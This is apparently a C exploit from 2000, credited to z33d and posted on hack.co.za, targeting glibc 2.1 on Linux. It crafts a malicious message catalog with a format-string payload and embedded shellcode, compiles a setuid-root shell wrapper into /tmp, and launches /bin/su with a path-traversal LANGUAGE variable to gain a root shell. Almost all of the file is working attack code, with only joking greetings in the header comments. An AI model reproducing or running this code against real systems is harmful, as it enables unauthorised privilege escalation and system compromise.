/*
 * "Bylem pijany (...) zaczela sciagac spodnie, nie wiedzialem co robic (...)"
 *						- greg@tenet.pl -
 *
 * GLIBC 2.1 language exploit by z33d@eth-security.net (C) 2000
 * with bypassing Solar Designer Stack Patch
 *
 * Dedicated to greg@tenet.pl
 *
 * It doesn't work. ;> Try use gdb to find special value.
 * Tested on Debian 2.1/2.2 ziemniak
 * Greetz:
 *  - abusers from if.pwr.wroc.pl :))) (IF-NET)
 *  - y3t1, dyziu, team140 riders - brunswick bedzie nasz ... :)
 *  - lcamtuf - argante rulz :)
 *  - Sierota, oczy niebieskie mowia wprost, wczoraj wyjatkowo aktywna noc...
 *    :))))))))))))))))))))))
 *  - secure@poz.sm.pl no i wogole #sigsegv
 *    funkysh, cliph, yeti, detergent, kris, ja, venglin, crashkill, ...
 *  - breslau killers z vx na czele :>
 *  - ppl from my so called real life
 *  - kefir truskawkowy
 * most code I ripped :>
 */

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>

#define DEFAULT_ALIGNMENT                 2
// #define DEFAULT_RETLOC           0xbfffd2ff
// #define DEFAULT_RETLOC	    0xbffff798
#define DEFAULT_RETLOC	0xbffff770
#define DEFAULT_BUFFER_SIZE            2048
#define PATH             "/tmp/LC_MESSAGES"

char shellcode[]=
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "dupaa"
  "\x31\xc0\xb0\x46\x31\xdb\x89\xd9\x4b\xcd\x80"
  "\xeb\x1f\x5e\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/tmp/sh";
  // very special shellcode, 15 min ;> big thanks to yeti

char sh[]=
  "#include <stdlib.h>\n"
  "#include <stdio.h>\n"
  "#include <unistd.h>\n"
  "int main(){\n"
  "setuid(0);\n"
  "setgid(0);\n"
  "system(\"/bin/bash\");\n"
  "}\n";

int main(int argc, char *argv[]) {
  char *buff, *buff1, *ptr;
  char *env[3];
  long shell_addr,retloc=DEFAULT_RETLOC;
  int align=DEFAULT_ALIGNMENT;
  int bsize=DEFAULT_BUFFER_SIZE;
  int i,reth,retl,num=132; // maybe 121
  struct stat j;
  FILE *fp;

  if (argc > 1) sscanf(argv[1],"%x",&retloc);
  if (argc > 2) num = atoi(argv[2]);

  printf("Stay sharp ...\n");
  printf("Usages: %s <RETloc> <num> (118<num<140)\n",argv[0]);

  if (!(buff = malloc(1024))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  if (!(buff1 = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  printf("Using RET location address: 0x%x\n", retloc);
  shell_addr=0x00124270; // or 0x00124250
  printf("Using Shellcode address: 0x%x\n", shell_addr);

  reth = (shell_addr >> 16) & 0xffff ;
  retl = (shell_addr >>  0) & 0xffff ;

  ptr = buff;

  for (i = 0; i <2 ; i++, retloc+=2 ){
    memset(ptr,'A',4);
    ptr += 4 ;
    (*ptr++) =  retloc & 0xff;
    (*ptr++) = (retloc >> 8  ) & 0xff ;
    (*ptr++) = (retloc >> 16 ) & 0xff ;
    (*ptr++) = (retloc >> 24 ) & 0xff ;
  }

  memset(ptr,'A',align);

  ptr = buff1;

  for(i = 0 ; i < num ; i++ )
  {
    memcpy(ptr, "%.8x", 4);
    ptr += 4;
  }

  sprintf(ptr, "%%%uc%%hn%%%uc%%hn",(retl - num*8),
    (0x10000 + reth - retl));


  mkdir(PATH,0755);
  chdir(PATH);
  fp = fopen("libc.po", "w+");
  if (!fp){
    printf("Skript kidies ?\n");
    exit(0);
  }
  fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n");
  fprintf(fp,"msgstr \"%s%s\\n\"", buff1,shellcode);
  fclose(fp);
  system("/usr/bin/msgfmt libc.po -o libc.mo");

  i=open("/tmp/LC_MESSAGES/libc.mo",O_RDWR);
  fstat(i,&j);
  lseek(i,j.st_size-2,SEEK_SET);
  write(i,"\0\0\0\0\0\0",6);
  close(i);

  fp = fopen("/tmp/sh.c","w+");
  if (!fp){
    printf("Skript kidies ?\n");
    exit(0);
  }
  fprintf(fp,"%s",sh);
  fclose(fp);
  system("cd /tmp;gcc sh.c -o sh");

  env[0] = "LANGUAGE=sk_SK/../../../../../../tmp";
  env[1] = (char *)0 ;

  execle("/bin/su","su","-u", buff, NULL,env);
  perror("execle");
  return 0;
}
/*                   www.hack.co.za   [8 September 2000]*/